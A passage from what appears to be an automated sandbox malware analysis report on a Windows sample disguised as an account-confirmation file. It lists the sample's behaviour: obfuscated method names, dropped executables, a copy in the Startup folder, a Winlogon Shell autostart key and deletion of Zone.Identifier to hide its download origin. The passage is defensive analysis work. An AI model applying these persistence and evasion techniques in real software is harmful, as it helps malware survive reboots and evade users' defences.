          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B24A0 push esp; retf 15_2_057B24A9
          Source: C:\Users\user\AppData\Local\Temp\java.exeCode function: 15_2_057B686C push FFFFFFBAh; iretd 15_2_057B686E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056324A0 push esp; retf 31_2_056324A9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05636864 push FFFFFFBAh; iretd 31_2_05636866
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068ED331 push 08068F37h; ret 31_2_068ED33D
          Source: Hesab#U0131 Onaylay#U0131n.exe, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 0.0.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 0.2.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 15.0.java.exe.a00000.2.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 15.0.java.exe.a00000.1.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 15.2.java.exe.a00000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 15.0.java.exe.a00000.3.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 15.0.java.exe.a00000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: java.exe.21.dr, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 30.0.java.exe.880000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 30.2.java.exe.880000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 31.2.java.exe.d10000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'
          Source: 31.0.java.exe.d10000.0.unpack, z5K/m7G.csHigh entropy of concatenated method names: '.ctor', 'Yq5', 'm6E', 'Xd4', 'Yt5', 'Mc5', 'w2L', 'Ff8', 'k5S', 'Kg3'

          Persistence and Installation Behavior

          barindex
          Exploit detected, runtime environment dropped PE file
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile created: AddInProcess32.exe.15.drJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the startup folder
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to dropped file
          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile opened: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile opened: C:\Users\user\AppData\Local\Temp\java.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe\:Zone.Identifier read attributes | delete
          Moves itself to temp directory
          Source: c:\users\user\desktop\hesab#u0131 onaylay#u0131n.exeFile moved: C:\Users\user\AppData\Local\Temp\java.exeJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess information set: NOOPENFILEERRORBOX
